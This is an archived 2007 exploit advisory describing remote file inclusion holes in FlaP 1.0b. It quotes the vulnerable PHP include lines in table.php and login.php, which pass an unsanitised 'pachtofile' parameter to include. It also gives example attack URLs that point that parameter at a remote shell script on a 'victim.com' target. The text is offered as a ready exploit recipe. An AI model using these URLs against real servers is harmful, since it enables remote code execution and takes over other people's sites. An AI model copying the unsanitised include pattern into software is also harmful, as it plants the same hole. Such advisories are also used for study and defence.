[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities
# Published : 2007-05-25
# Author : xoron
# Previous Title : OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities
# Next Title : Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit
##############################################################################################
# FlaP v.1.0. Beta <= Remote File Inclusion Vulnerability #
# #
# #
##############################################################################################
#Vuln Code #
# #
#ERROR1:skin/html/table.php #
# #
# <? include "$pachtofile/left_menu.php"; <<< RFI CODE #
# #
# #
#BUG1: #
# #
#Example1:http://victim.com/path/skin/html/table.php?pachtofile=[[Sh3LL Script]] #
##############################################################################################
# #
#ERROR2:login.php #
# #
#<? include "$pachtofile/right_menu.php"; ?></ <<< RFI CODE #
# #
# #
#BUG2: #
# #
#Example1:http://victim.com/path/login.php?pachtofile=[[Sh3LL Script]] #
##############################################################################################
##############################################################################################
# #
#Script Download #
##############################################################################################
# #
#http://scripts.protoplex.ru/scripts_show/1854.html #
# #
##############################################################################################
# #
#Cyber-Security #
# #
##############################################################################################
# www.Syue.com [2007-05-25]